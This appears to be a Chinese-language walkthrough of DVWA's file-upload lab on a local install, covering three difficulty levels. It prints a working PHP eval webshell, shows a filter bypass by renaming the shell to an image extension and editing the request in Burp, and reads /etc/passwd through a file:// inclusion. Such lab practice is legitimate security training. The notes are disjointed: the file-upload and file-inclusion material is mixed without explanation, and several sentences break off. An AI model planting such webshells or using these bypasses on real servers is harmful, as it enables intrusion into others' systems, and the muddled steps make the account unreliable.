- List item
Low
没有进行任何过滤
首相,上传一个phpinfo.php,其内代码如下:
<?php phpinfo(); ?>
上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然后访问
首先,写好
说明存在上传和执行漏洞
上传一句话木马:
<?php @eval($_POST[“hack”]); ?>
保存为hack.php
然后上传
找到文件上传目录
http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php
可以直接用hackbar这个插件,上传命令,爆出信息
使用菜刀连接
成功
Medium
有过滤
使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。
同时,因为替换的只是“../”、“..\”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。
可以先在上传一个
此题要求,需要上传 .png或 .jpeg格式文件
因此,我们想到可以更改文件类型,然后上传
直接hack.php扩展名改为hack.png,然后上传,
可以上传成功,
使用菜刀连接
连接不上
制作图片码上传,同样如此
那么,可以使用burp抓包修改文件类型看看
成功
High
其过滤内容为
这个if语句的意思是如果page中不含有file并且page不等于include.php服务器才不会去包含相应的文件。两个条件只要不满足其中之一就可以,要么page等于include.php,要么page含有file。用file://流访问本地文件系统
http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd
说明存在命令执行
上菜刀,结果发现无聊是如何,jar版本的死活连不上,使用windows .exe版本的可以,我也懵逼